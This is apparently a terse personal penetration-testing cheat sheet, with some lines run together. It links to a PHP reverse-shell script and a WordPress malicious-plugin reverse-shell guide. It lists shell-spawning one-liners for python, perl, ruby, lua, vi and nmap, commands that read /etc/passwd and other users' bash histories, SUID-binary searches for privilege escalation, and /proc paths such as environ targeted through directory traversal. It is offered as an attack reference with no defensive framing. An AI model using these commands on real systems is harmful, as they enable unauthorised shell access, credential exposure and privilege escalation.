Revers shell
Python
https://docs.j7k6.org/wordpress-malicious-plugin-reverse-shell-metasploit/
Shell
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Spawn tty
python -c 'import pty; pty.spawn("/bin/sh")'echo os.system('/bin/bash')/bin/sh -iperl —e 'exec "/bin/sh";'perl: exec "/bin/sh";ruby: exec "/bin/sh"lua: os.execute('/bin/sh')(From within IRB)exec "/bin/sh"(From within vi):!bash(From within vi):set shell=/bin/bash:shell(From within nmap)!shPython server
python -m SimpleHTTPServer 80Enumeration
running process
https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0
linenum
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Unix privesc
https://pentestmonkey.net/tools/audit/unix-privesc-check
Linprivchecker.py
https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py
Websites
‘https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html'
Commands
cat /home/*/.bash_his*
cat /etc/passwdPrivesc
sudo -lfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;find . -perm /4000
find . -perm /2000
find . -perm /6000 directory traversal
/proc/sched_debug/proc/mounts/proc/net/arp/proc/net/route/proc/net/tcp and /proc/net/udp/proc/net/fib_trie/proc/version/proc/[PID]/cmdline/proc/[PID]/environ/proc/[PID]/cwd/proc/[PID]/fd/[#]